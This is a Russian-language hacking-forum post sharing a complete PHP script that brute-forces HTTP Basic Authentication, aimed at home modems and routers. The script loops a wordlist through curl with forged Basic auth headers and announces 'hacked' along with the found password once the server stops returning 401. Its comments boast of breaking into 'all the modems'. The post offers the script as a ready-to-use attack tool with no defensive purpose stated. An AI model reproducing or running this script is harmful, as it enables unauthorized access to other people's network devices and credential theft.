• Добро пожаловать на сайт - Forumteam.wiki !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

HTTP Basic Authentication Brute-force

  • Автор темы mars0
  • Дата начала
  • Ответы 0
  • Просмотры 5K

mars0

Проявляет активность
Местный
Регистрация
11.11.17
Сообщения
473
Реакции
44
Баллы
320
FTC
10¢
Небольшой скрипт для брута HTTP Basic Authentication , для примера модемов

PHP:
<?php
error_reporting(0);
ini_set('memory_limit', '6000M');
set_time_limit(0);


/*

HTTP AUTH брутер, паблик версия
Взломаем все модемы xD
/Psychopomp for IFUD


Use:

$ php -f brute.php

############################################################
**************** HTTP AUTH брутер, паблик версия **************
********************* Мануал ********************
php -f script.php username wordlist.txt http://192.168.1.1/
********************* Coded By Psychopomp for IFUD ********************
***********************************************************




*/

$use=' php -f script.php username wordlist.txt http://192.168.1.1/';
$ban=str_repeat('#',60) . PHP_EOL . ' **************** HTTP AUTH брутер, паблик версия **************' . PHP_EOL .
' ********************* Мануал ********************'.
PHP_EOL .$use . PHP_EOL .
' ********************* Coded By Psychopomp for IFUD ********************'. PHP_EOL .
' *********************************************************** ' .PHP_EOL ;



$un=$argv[1];

$wordlist=$argv[2];

$ip=$argv[3];


if(count($argv)!=4){ die(PHP_EOL . $ban . PHP_EOL);}

echo $ban;

//print_r($argv);exit; 1
$passm=file($wordlist) or die('Не могу открыть wordlist файл!' .PHP_EOL);




foreach($passm as $pass)
{

!isset($za) ? $za=NULL : '';$za++;


$pass=trim((string)$pass);




$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => $ip,
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
curl_setopt($ch, CURLOPT_TIMEOUT, 12),
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Basic ' . base64_encode($un.':'.$pass))));

curl_setopt_array($ch, $curlConfig);
curl_exec($ch);

$stat_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);//200 SUCCESS.//
echo 'HTTP STATUS CODE: ' . $stat_code . ' ';




curl_close($ch);




if($stat_code!==401) // success 200
{
echo '[' . $za .']' . ' ' . 'Взломан! ' . htmlspecialchars((string)$un) . ' Пароль: ' . htmlspecialchars((string)$pass). PHP_EOL;
exit;
}
else
{
echo '[' .$za .']' . ' ' . 'Проверяется => ' . htmlspecialchars((string)$un) . ' В качестве пароля: ' . htmlspecialchars((string)$pass). PHP_EOL;
}


}

unset($pass);


?>
 
Сверху Снизу